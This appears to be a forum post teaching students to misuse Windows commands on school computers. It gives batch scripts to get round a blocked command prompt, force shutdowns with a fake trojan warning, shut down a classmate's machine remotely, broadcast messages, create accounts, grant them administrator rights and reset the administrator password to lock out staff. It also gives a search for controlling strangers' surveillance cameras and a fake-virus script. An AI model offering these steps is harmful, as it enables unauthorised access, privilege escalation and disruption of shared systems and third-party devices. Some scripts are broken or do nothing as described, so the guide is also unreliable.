Lets start
All school have blocked the command prompt [cmd]
now we will need to unblock this
to do this
in notepad typ:
- Code:
@echo off
@echo on
then save it as a .bat file..... eg:command.bat
now open it and you have a cmd.
ok now to the next one
the classic shutting down of a cpu
to do this
in notepad type:
- Code:
shutdown -s -t 30 -c "WARNING TROJAN DETECTED"
save it as a .bat file
now if you click on this and you dont want it to shutdown your cpu then
you need to make a abrot program
to do this in notepad:
- Code:
start shutdown -a
save as a .bat file
use that when the shutdown script is activated.
Now how to unblock a website
in notepad type:
- Code:
@echo off
title web unblocker
save it as a .bat file
then open it
type in a website url e.g www.youtube.com
it will then give you three [you tube] ip address
type one of those ip into browser and you are in youtube
if dont then use proxy sites.
Have you hatted a guy and his sitting on a cpu at the the other end of the class????
and have you every thought about shutting down his cpu remotely, well now you can.....
in cmd [cmd] comand prompt type:
- Code:
shutdown -i
and then with the new window that pops up u click on the cpu
[its named by the account thats logged onto it]
and then click on ok
then his cpu turns off lolzzz
its funny
now if you want to say something to your friend then your teacher said"NO Talking"
and you realy need to say something to your friend well now u can
in cmd type
- Code:
msg <acc name> <message>
now that will send that msg to that friend
but if you want to send that msg to the entire system
then you type
msg * <message>
msg * "there will be a fight this afternoon at the back of school"
and that will be sent to everyone
8)Different Accounts
type in cmd type:
- Code:
net user disired name disired pass /add
now thats no fun unless you have admin powers...
now to do that
in cmd type:
- Code:
net localgroup administrators <name of acc> /add
and there you go admin powers
or if you hate the admin....and you want to just simply change the pass
so they can't go on but you can then you type in cmd
net user administrator *
it will say type a new password for the user
and then type one in
but you can't log onto it without the acc name so type in cmd
net users
and that will show you the acc name
something to do fun with your friends
{but some school systems are to bad to do it}
type into google
- Code:
snc - rz30 home
and there you go
your in some persons online serveylance cammera
and you can control it.
now for a scary fake virus in notepad:
- Code:
@echo off
shutdown -s -t 30 -c "deleting"
echo file:2323#@$
echo file:32433$$%%
echo file:#$@#$!53
echo file:#$35323
echo file:24@#$%2
goto hack
now that is a funny but fake virus...